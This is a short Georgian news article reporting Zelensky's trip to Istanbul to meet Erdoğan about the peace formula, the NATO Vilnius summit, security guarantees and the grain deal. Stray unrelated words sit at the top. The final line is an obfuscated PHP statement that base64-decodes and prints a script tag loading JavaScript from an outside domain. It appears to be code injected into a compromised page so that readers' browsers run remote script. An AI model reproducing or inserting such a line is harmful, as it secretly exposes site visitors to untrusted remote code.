celsiusi
ავერსი საქკაბელი

 უკრაინის პრეზიდენტი ვოლოდიმირ ზელენსკი თურქეთში ჩავიდა, სადაც თურქეთის პრეზიდენტ რეჯეფ თაიფ ერდოღანს შეხვდება.

უკრაინის ლიდერი სტამბოლში მას შემდეგ ჩავიდა, რაც ვიზიტით იმყოფებოდა ბულგარეთში, ჩეხეთსა და სლოვაკეთში.

როგორც სოციალური ქსელებში ზელენსკის გვერდზეა ნათქვამი, ის ერდოღანთან შეხვედრაზე განიხილავს „მშვიდობის ფორმულას“, ასევე ნატო-ს ვილნიუსის სამიტისთვის მზადებას, უსაფრთხოების გარანტიებსა და „მარცვლეულის შეთანხმების“ საკითხებს.

ზელენსკის ოფისში აცხადებენ, რომ ორი ქვეყნის ლიდერი ასევე განიხილავენ უკრიანის აღდგენის საკთხებსა და სამხედრო კონტრაქტებს ორი ქვეყნის საწარმოებს შორის.

მედია ასევე წერს, რომ ზელენსკისთან შეხვედრის შემდეგ, ერდოღანი აპირებს სატელეფონო საუბარი გამართოს რუსეთის პრეზიდენტ ვლადიმერ პუტინთან.

468
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");